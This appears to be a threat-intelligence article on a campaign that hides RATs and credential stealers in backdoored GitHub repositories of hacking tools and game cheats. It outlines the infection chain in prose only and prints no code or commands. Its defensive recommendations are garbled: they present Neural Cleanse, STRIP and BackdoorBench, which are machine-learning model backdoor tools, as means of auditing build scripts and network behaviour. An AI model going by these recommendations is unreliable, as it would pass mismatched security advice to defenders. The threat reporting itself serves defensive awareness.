A recent campaign has been identified where threat actors are distributing malicious code through GitHub repositories, specifically targeting hackers, gamers, and security researchers. The attackers embed backdoors in open-source tools, exploits, and game cheats, enabling remote access to infected systems. This tactic exploits trust in community-shared code, making it a significant threat to developers and security professionals who rely on GitHub for research or tooling.
Summary for Security Leaders
Attackers are leveraging GitHub’s open-source ecosystem to distribute malware under the guise of legitimate tools. The campaign focuses on repositories offering hacking utilities, game cheats, and automation scripts, with over 141 repositories identified—133 confirmed as backdoored. The payloads include Remote Access Trojans (RATs) like Sakura RAT and Lumma Stealer, delivered via obfuscated build scripts or dependencies. This poses risks to organizations whose developers might inadvertently integrate these tools into their workflows.
- Primary Targets: Hackers, gamers, and researchers using GitHub for tools/scripts.
- Attack Vector: Malicious repositories with hidden backdoors in build scripts (e.g.,
PreBuildEventin Visual Studio). - Payloads: RATs (Sakura, Lumma Stealer, AsyncRAT) and credential stealers.
- Defense: Code audits, behavioral monitoring, and community reporting.
Technical Analysis of the Campaign
The attackers employ sophisticated techniques to evade detection. For example, some repositories use automated commits (e.g., 60,000 commits in a single repo) to appear active and legitimate. The infection chain often involves multi-stage payloads, such as VBS scripts executing PowerShell commands to fetch a 7zip archive, which then deploys an Electron app (SearchFilter.exe). Obfuscated JavaScript (main.js) is used to disable Windows Defender and profile systems before deploying the final payload.
Notably, the campaign exploits tools like phpsploit (a PHP backdoor framework) and jok3r (a pentest automation tool), repackaging them with malicious code. Researchers at Kaspersky and BleepingComputer have linked these repositories to a single threat actor, though attribution remains unclear.
Defensive Recommendations
Organizations and individuals should adopt the following measures to mitigate risks:
- Code Audits: Review build scripts (
.csproj,package.json) and dependencies for suspicious activity. Tools like Neural Cleanse can help detect anomalies. - Behavioral Analysis: Monitor for unusual network traffic during compilation. Solutions like STRIP can sanitize inputs.
- Community Vigilance: Report suspicious repositories via GitHub’s security advisory system. Projects like BackdoorBench provide standardized testing for backdoors.
Relevance to Security Professionals
This campaign highlights the risks of relying on unvetted open-source code, particularly in red-team tooling or research. For blue teams, it underscores the need for robust supply-chain security and runtime monitoring. System administrators should enforce strict policies on third-party code execution, while threat intelligence teams should track related indicators of compromise (IoCs).
Conclusion
The abuse of GitHub repositories for malware distribution is a growing trend, exploiting trust in open-source collaboration. Security teams must prioritize code review processes and educate developers on the risks of unverified dependencies. Future attacks may leverage similar tactics, making proactive defense strategies critical.
References
- “Hacker targets other hackers and gamers with backdoored GitHub code,” BleepingComputer, Jun. 4, 2025.
- “Malicious code in GitHub: A hidden threat,” Kaspersky Blog, Feb. 25, 2025.
- phpsploit GitHub repository (accessed Jun. 4, 2025).
- jok3r GitHub repository (accessed Jun. 4, 2025).
